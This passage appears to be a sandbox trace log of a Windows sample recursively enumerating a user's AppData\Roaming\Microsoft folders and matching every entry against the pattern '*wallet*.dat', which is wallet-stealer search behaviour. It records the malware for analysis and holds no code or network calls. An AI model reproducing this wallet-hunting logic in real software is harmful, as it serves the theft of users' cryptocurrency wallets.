ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0207.371] StrCmpCA (pszStr1="Microsoft", pszStr2=".") returned 31 [0207.371] StrCmpCA (pszStr1="Microsoft", pszStr2="..") returned 31 [0207.371] wsprintfA (in: param_1=0x19d0c0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft") returned 47 [0207.371] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0207.371] wsprintfA (in: param_1=0x19d1c8, param_2="%s" | out: param_1="Microsoft") returned 9 [0207.371] PathMatchSpecA (pszFile="Microsoft", pszSpec="*wallet*.dat") returned 0 [0207.371] wsprintfA (in: param_1=0x19cd90, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*") returned 49 [0207.371] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x5b0260, cFileName=".", cAlternateFileName="")) returned 0x5e7b48 [0207.372] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.372] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x5b0260, cFileName="..", cAlternateFileName="")) returned 1 [0207.372] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.372] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.372] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x5b0260, cFileName="AddIns", cAlternateFileName="")) returned 1 [0207.372] StrCmpCA (pszStr1="AddIns", pszStr2=".") returned 19 [0207.372] StrCmpCA (pszStr1="AddIns", pszStr2="..") returned 19 [0207.372] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns") returned 54 [0207.372] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0207.372] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\AddIns") returned 16 [0207.372] PathMatchSpecA (pszFile="AddIns", pszSpec="*wallet*.dat") returned 0 [0207.372] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned 56 [0207.372] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e08 [0207.373] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.373] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.374] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.374] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.374] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0207.374] FindClose (in: hFindFile=0x5e7e08 | out: hFindFile=0x5e7e08) returned 1 [0207.374] FindNextFileA (in: hFindFile=0x5e7b48, lpFindFileData=0x19cc48 | out: lpFindFileData=0x19cc48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e898ff, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0207.374] StrCmpCA (pszStr1="Bibliography", pszStr2=".") returned 20 [0207.374] StrCmpCA (pszStr1="Bibliography", pszStr2="..") returned 20 [0207.374] wsprintfA (in: param_1=0x19ca38, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography") returned 60 [0207.374] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0207.374] wsprintfA (in: param_1=0x19cb40, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography") returned 22 [0207.374] PathMatchSpecA (pszFile="Bibliography", pszSpec="*wallet*.dat") returned 0 [0207.374] wsprintfA (in: param_1=0x19c708, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned 62 [0207.374] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e08 [0207.375] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.375] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.375] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.375] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.376] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19c5c0 | out: lpFindFileData=0x19c5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Style", cAlternateFileName="")) returned 1 [0207.376] StrCmpCA (pszStr1="Style", pszStr2=".") returned 37 [0207.376] StrCmpCA (pszStr1="Style", pszStr2="..") returned 37 [0207.376] wsprintfA (in: param_1=0x19c3b0, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned 66 [0207.376] StrCmpCA (pszStr1="Microsoft\\Bibliography", pszStr2="") returned 77 [0207.376] wsprintfA (in: param_1=0x19c4b8, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style") returned 28 [0207.376] PathMatchSpecA (pszFile="Style", pszSpec="*wallet*.dat") returned 0 [0207.376] wsprintfA (in: param_1=0x19c080, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned 68 [0207.376] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a48 [0207.395] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0207.395] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80ed2ca5, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.395] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0207.396] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0207.396] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e9e60e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9e60e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a58ff51, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0207.396] StrCmpCA (pszStr1="APASixthEditionOfficeOnline.xsl", pszStr2=".") returned 19 [0207.396] StrCmpCA (pszStr1="APASixthEditionOfficeOnline.xsl", pszStr2="..") returned 19 [0207.396] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 98 [0207.396] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.396] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 60 [0207.396] PathMatchSpecA (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0207.396] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl\\*") returned 100 [0207.396] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e9e60e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9e60e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a58ff51, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="A", cAlternateFileName="J")) returned 0xffffffff [0207.396] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ea6d97, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ea6d97, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0207.396] StrCmpCA (pszStr1="CHICAGO.XSL", pszStr2=".") returned 21 [0207.396] StrCmpCA (pszStr1="CHICAGO.XSL", pszStr2="..") returned 21 [0207.397] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 78 [0207.397] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.397] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 40 [0207.397] PathMatchSpecA (pszFile="CHICAGO.XSL", pszSpec="*wallet*.dat") returned 0 [0207.397] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL\\*") returned 80 [0207.397] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ea6d97, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ea6d97, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="C", cAlternateFileName="J")) returned 0xffffffff [0207.397] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eabbab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eabbab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a6d16e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0207.397] StrCmpCA (pszStr1="GB.XSL", pszStr2=".") returned 25 [0207.397] StrCmpCA (pszStr1="GB.XSL", pszStr2="..") returned 25 [0207.397] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL") returned 73 [0207.397] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.397] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GB.XSL") returned 35 [0207.397] PathMatchSpecA (pszFile="GB.XSL", pszSpec="*wallet*.dat") returned 0 [0207.397] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL\\*") returned 75 [0207.397] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eabbab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eabbab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a6d16e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="G", cAlternateFileName="J")) returned 0xffffffff [0207.397] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eaf650, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eaf650, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0207.397] StrCmpCA (pszStr1="GostName.XSL", pszStr2=".") returned 25 [0207.397] StrCmpCA (pszStr1="GostName.XSL", pszStr2="..") returned 25 [0207.398] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL") returned 79 [0207.398] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.398] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GostName.XSL") returned 41 [0207.398] PathMatchSpecA (pszFile="GostName.XSL", pszSpec="*wallet*.dat") returned 0 [0207.398] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL\\*") returned 81 [0207.398] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eaf650, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eaf650, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="G", cAlternateFileName="J")) returned 0xffffffff [0207.398] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb319b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb319b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0207.398] StrCmpCA (pszStr1="GostTitle.XSL", pszStr2=".") returned 25 [0207.398] StrCmpCA (pszStr1="GostTitle.XSL", pszStr2="..") returned 25 [0207.398] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0207.398] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.398] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 42 [0207.398] PathMatchSpecA (pszFile="GostTitle.XSL", pszSpec="*wallet*.dat") returned 0 [0207.398] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL\\*") returned 82 [0207.398] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb319b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb319b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a638a82, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="G", cAlternateFileName="J")) returned 0xffffffff [0207.398] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb804f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb804f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a7ecfbc, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0207.399] StrCmpCA (pszStr1="HarvardAnglia2008OfficeOnline.xsl", pszStr2=".") returned 26 [0207.399] StrCmpCA (pszStr1="HarvardAnglia2008OfficeOnline.xsl", pszStr2="..") returned 26 [0207.399] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0207.399] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.399] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 62 [0207.399] PathMatchSpecA (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0207.399] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl\\*") returned 102 [0207.399] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80eb804f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80eb804f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5a7ecfbc, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="H", cAlternateFileName="J")) returned 0xffffffff [0207.399] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ebb9a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ebb9a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0207.399] StrCmpCA (pszStr1="IEEE2006OfficeOnline.xsl", pszStr2=".") returned 27 [0207.399] StrCmpCA (pszStr1="IEEE2006OfficeOnline.xsl", pszStr2="..") returned 27 [0207.399] wsprintfA (in: param_1=0x19bd28, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0207.399] StrCmpCA (pszStr1="Microsoft\\Bibliography\\Style", pszStr2="") returned 77 [0207.399] wsprintfA (in: param_1=0x19be30, param_2="%s\\%s" | out: param_1="Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 53 [0207.399] PathMatchSpecA (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*wallet*.dat") returned 0 [0207.399] wsprintfA (in: param_1=0x19b9f8, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl\\*") returned 93 [0207.399] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl\\*", lpFindFileData=0x19b8b0 | out: lpFindFileData=0x19b8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ebb9a1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ebb9a1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="I", cAlternateFileName="J")) returned 0xffffffff [0207.400] FindNextFileA (in: hFindFile=0x5e7a48, lpFindFileData=0x19bf38 | out: lpFindFileData=0x19bf38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80ec07b6, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80ec07b6, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5afed704, 